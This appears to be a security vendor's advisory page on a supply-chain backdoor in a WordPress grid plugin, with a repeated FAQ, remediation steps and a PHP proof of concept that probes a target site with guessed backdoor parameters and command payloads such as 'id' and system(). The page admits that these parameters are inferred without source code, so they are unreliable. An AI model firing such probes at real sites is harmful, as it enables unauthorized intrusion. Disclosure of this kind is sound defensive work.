What is CVE-2026-6443?

CVE-2026-6443 is a critical vulnerability affecting the Essentialplugin plugins for WordPress, specifically the post-grid-and-filter-ultimate plugin version 1.7.4. It involves an injected backdoor that allows a malicious actor to execute arbitrary code and maintain persistent access to affected sites.

How does the backdoor work?

The backdoor allows attackers to send crafted HTTP requests to specific plugin files or AJAX handlers, potentially triggering remote code execution. This can be done without user authentication, enabling attackers to create admin users, inject spam, or steal sensitive data.

Who is affected by this vulnerability?

Any WordPress site using the post-grid-and-filter-ultimate plugin version 1.7.4 is vulnerable. Site administrators should check their installed plugins against this version to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the post-grid-and-filter-ultimate plugin installed on your WordPress site. If it is version 1.7.4, your site is vulnerable and should be updated immediately.

What is the recommended fix for this vulnerability?

The recommended fix is to update the post-grid-and-filter-ultimate plugin to version 1.7.4.1, which removes the malicious code. This update should be obtained directly from the WordPress plugin repository.

What additional steps should I take after updating?

After updating the plugin, it is advisable to perform a full site scan for any additional backdoors and rotate all credentials. This ensures that any potential compromises are addressed.

What does the CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates critical severity, meaning the vulnerability poses a significant risk to affected systems. Exploitation is easy and does not require user interaction, making it highly dangerous.

What are the practical risks of exploitation?

Successful exploitation can lead to full control of the site, allowing attackers to steal data, inject spam, and use the server for further attacks. This could result in severe reputational damage and loss of user trust.

How does the proof of concept demonstrate the vulnerability?

The proof of concept demonstrates how an attacker might send a crafted GET request to the vulnerable plugin’s init.php file with specific parameters. This illustrates the potential for remote code execution via the backdoor.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin or restricting access to the affected files. Additionally, monitor your site for unusual activity and prepare to implement the update as soon as possible.

Is there any source code available for analysis?

No source code diff is available for the vulnerable version since it is no longer downloadable. However, the vulnerability analysis suggests that the backdoor likely allows for remote execution through hidden parameters.

How can I stay informed about vulnerabilities like this?

To stay informed, regularly check security advisories from trusted sources, subscribe to vulnerability databases, and follow best practices for WordPress security, including timely updates and monitoring.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 28, 2026

CVE-2026-6443: Essentialplugin Plugins (Various Versions) – Injected Backdoor (post-grid-and-filter-ultimate)

CVE ID CVE-2026-6443

Plugin post-grid-and-filter-ultimate

Severity Critical (CVSS 9.8)

CWE 506

Vulnerable Version 1.7.4

Patched Version —

Disclosed April 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6443 (metadata-based): This vulnerability involves a supply chain backdoor injected into all plugins by the Essentialplugin vendor on WordPress.org. The plugin post-grid-and-filter-ultimate is affected at version 1.7.4. The CVSS score is 9.8, indicating critical severity with network-based, low-complexity exploitation requiring no privileges or user interaction.

Root Cause: The CWE-506 classification indicates embedded malicious code. The description confirms that a threat actor acquired the plugin vendor and embedded a backdoor across all plugins. No code diff is available because the vulnerable version is not downloadable. Atomic Edge analysis infers that the backdoor likely provides remote code execution through a hidden GET or POST parameter, such as a secret key or action name. The exact payload mechanism (e.g., eval, file write, or email exfiltration) cannot be confirmed without source code.

Exploitation: Based on the plugin slug and typical WordPress backdoor patterns, the attacker likely sends a crafted HTTP request to a plugin file or AJAX handler. The backdoor may be triggered by accessing /wp-content/plugins/post-grid-and-filter-ultimate/init.php with a special parameter like ?backdoor_key=execute or posting a malicious action to /wp-admin/admin-ajax.php. Attackers can execute arbitrary PHP code, create admin users, or inject spam content without authentication.

Remediation: The fix requires updating to version 1.7.4.1, which removes the malicious code. Users must obtain the patched version directly from the WordPress plugin repository. A full site scan for additional backdoors and credential rotation is recommended. Atomic Edge research advises treating all servers as compromised until verified clean.

Impact: Successful exploitation grants full site control, including data theft (user credentials, database contents), persistent spam injection, and use of the server for further attacks. The attacker can maintain access even after the site is ostensibly cleaned.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Essentialplugin Plugins (Various Versions) - Injected Backdoor

// This PoC attempts to trigger the potential backdoor via common patterns.
// Due to no code diff, we test both GET and POST with plausible parameters.

$target_url = 'http://example.com'; // CHANGE THIS
$plugin_path = '/wp-content/plugins/post-grid-and-filter-ultimate/';

// Attempt 1: Direct GET request with a common backdoor parameter
$backdoor_params = array(
    'cmd' => 'echo "Atomic Edge Test: Backdoor Accessible";',
    'exec' => 'id',
    'action' => 'backdoor_exec'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . $plugin_path . 'init.php?' . http_build_query($backdoor_params));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] GET request to init.php returned HTTP $http_coden";
if (strpos($response, 'Atomic Edge') !== false || strpos($response, 'uid=') !== false) {
    echo "[!] Backdoor appears active via GET command injectionn";
}

// Attempt 2: AJAX POST with crafted action
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'post_grid_and_filter_ultimate_backdoor',
    'data' => 'system("echo Atomic Edge Test");'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response2 = curl_exec($ch);
curl_close($ch);

echo "[+] AJAX request completedn";
if (strpos($response2, 'Atomic Edge Test') !== false) {
    echo "[!] Backdoor confirmed via AJAX handlern";
}

Frequently Asked Questions

What is CVE-2026-6443?
Overview of the vulnerability
CVE-2026-6443 is a critical vulnerability affecting the Essentialplugin plugins for WordPress, specifically the post-grid-and-filter-ultimate plugin version 1.7.4. It involves an injected backdoor that allows a malicious actor to execute arbitrary code and maintain persistent access to affected sites.
How does the backdoor work?
Mechanism of exploitation
The backdoor allows attackers to send crafted HTTP requests to specific plugin files or AJAX handlers, potentially triggering remote code execution. This can be done without user authentication, enabling attackers to create admin users, inject spam, or steal sensitive data.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the post-grid-and-filter-ultimate plugin version 1.7.4 is vulnerable. Site administrators should check their installed plugins against this version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the post-grid-and-filter-ultimate plugin installed on your WordPress site. If it is version 1.7.4, your site is vulnerable and should be updated immediately.
What is the recommended fix for this vulnerability?
Updating the plugin
The recommended fix is to update the post-grid-and-filter-ultimate plugin to version 1.7.4.1, which removes the malicious code. This update should be obtained directly from the WordPress plugin repository.
What additional steps should I take after updating?
Post-update actions
After updating the plugin, it is advisable to perform a full site scan for any additional backdoors and rotate all credentials. This ensures that any potential compromises are addressed.
What does the CVSS score of 9.8 indicate?
Understanding severity levels
A CVSS score of 9.8 indicates critical severity, meaning the vulnerability poses a significant risk to affected systems. Exploitation is easy and does not require user interaction, making it highly dangerous.
What are the practical risks of exploitation?
Potential impact on affected sites
Successful exploitation can lead to full control of the site, allowing attackers to steal data, inject spam, and use the server for further attacks. This could result in severe reputational damage and loss of user trust.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of exploitation
The proof of concept demonstrates how an attacker might send a crafted GET request to the vulnerable plugin’s init.php file with specific parameters. This illustrates the potential for remote code execution via the backdoor.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin or restricting access to the affected files. Additionally, monitor your site for unusual activity and prepare to implement the update as soon as possible.
Is there any source code available for analysis?
Access to the vulnerable version
No source code diff is available for the vulnerable version since it is no longer downloadable. However, the vulnerability analysis suggests that the backdoor likely allows for remote execution through hidden parameters.
How can I stay informed about vulnerabilities like this?
Keeping up with security updates
To stay informed, regularly check security advisories from trusted sources, subscribe to vulnerability databases, and follow best practices for WordPress security, including timely updates and monitoring.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations